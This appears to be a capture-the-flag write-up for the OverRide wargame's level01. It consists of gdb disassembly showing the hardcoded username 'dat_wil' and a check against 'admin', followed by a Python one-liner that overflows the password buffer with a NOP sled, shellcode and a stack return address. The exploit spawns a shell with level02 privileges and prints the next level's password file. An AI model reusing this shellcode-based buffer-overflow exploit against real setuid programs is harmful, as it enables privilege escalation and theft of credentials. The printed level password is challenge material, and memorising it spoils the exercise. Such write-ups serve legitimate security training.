

```
   0x08048510 <+64>:    mov    eax,ds:0x804a020                 // 0x804a020 <stdin@@GLIBC_2.0>:    ""
   0x08048515 <+69>:    mov    DWORD PTR [esp+0x8],eax
   0x08048519 <+73>:    mov    DWORD PTR [esp+0x4],0x100
   0x08048521 <+81>:    mov    DWORD PTR [esp],0x804a040        // 0x804a040 <a_user_name>:         ""
   0x08048528 <+88>:    call   0x8048370 <fgets@plt>
   0x0804852d <+93>:    call   0x8048464 <verify_user_name>
   0x08048532 <+98>:    mov    DWORD PTR [esp+0x5c],eax
   0x08048536 <+102>:   cmp    DWORD PTR [esp+0x5c],0x0
   0x0804853b <+107>:   je     0x8048550 <main+128>
```

```
   0x0804855c <+140>:   mov    eax,ds:0x804a020                 // 0x804a020 <stdin@@GLIBC_2.0>:    ""
   0x08048561 <+145>:   mov    DWORD PTR [esp+0x8],eax
   0x08048565 <+149>:   mov    DWORD PTR [esp+0x4],0x64
   0x0804856d <+157>:   lea    eax,[esp+0x1c]
   0x08048571 <+161>:   mov    DWORD PTR [esp],eax
   0x08048574 <+164>:   call   0x8048370 <fgets@plt>
   0x08048579 <+169>:   lea    eax,[esp+0x1c]
   0x0804857d <+173>:   mov    DWORD PTR [esp],eax
   0x08048580 <+176>:   call   0x80484a3 <verify_user_pass>
   0x08048585 <+181>:   mov    DWORD PTR [esp+0x5c],eax
   0x08048589 <+185>:   cmp    DWORD PTR [esp+0x5c],0x0
   0x0804858e <+190>:   je     0x8048597 <main+199>
```

```
(gdb) disas verify_user_name
Dump of assembler code for function verify_user_name:
...
   0x08048478 <+20>:    mov    edx,0x804a040                            // 0x804a040 <a_user_name>:         ""
   0x0804847d <+25>:    mov    eax,0x80486a8                            // 0x80486a8:       "dat_wil"
   0x08048482 <+30>:    mov    ecx,0x7
   0x08048487 <+35>:    mov    esi,edx
   0x08048489 <+37>:    mov    edi,eax
   0x0804848b <+39>:    repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
   0x0804848d <+41>:    seta   dl
   0x08048490 <+44>:    setb   al
   0x08048493 <+47>:    mov    ecx,edx
   0x08048495 <+49>:    sub    cl,al
   0x08048497 <+51>:    mov    eax,ecx
   0x08048499 <+53>:    movsx  eax,al
...
End of assembler dump.
```

```
disas verify_user_pass
Dump of assembler code for function verify_user_pass:
   0x080484a8 <+5>:     mov    eax,DWORD PTR [ebp+0x8]                  // user input
   0x080484ab <+8>:     mov    edx,eax
   0x080484ad <+10>:    mov    eax,0x80486b0                            // 0x80486b0:       "admin"
   0x080484b2 <+15>:    mov    ecx,0x5
   0x080484b7 <+20>:    mov    esi,edx
   0x080484b9 <+22>:    mov    edi,eax
   0x080484bb <+24>:    repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
   0x080484bd <+26>:    seta   dl
   0x080484c0 <+29>:    setb   al
   0x080484c3 <+32>:    mov    ecx,edx
   0x080484c5 <+34>:    sub    cl,al
   0x080484c7 <+36>:    mov    eax,ecx
   0x080484c9 <+38>:    movsx  eax,al
...
End of assembler dump.
```

```
level01@OverRide:~$ python -c 'print("dat_wil\n"+"\x90"*(80-70)+"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"+"\x90"*20+"\x2c\xde\xff\xff")' | env - ./level01

$ id
uid=1001(level01) gid=1001(level01) euid=1002(level02) egid=100(users) groups=1002(level02),100(users),1001(level01)
$ pwd
/home/users/level01
$ cat /home/users/level02/.pass
PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv
```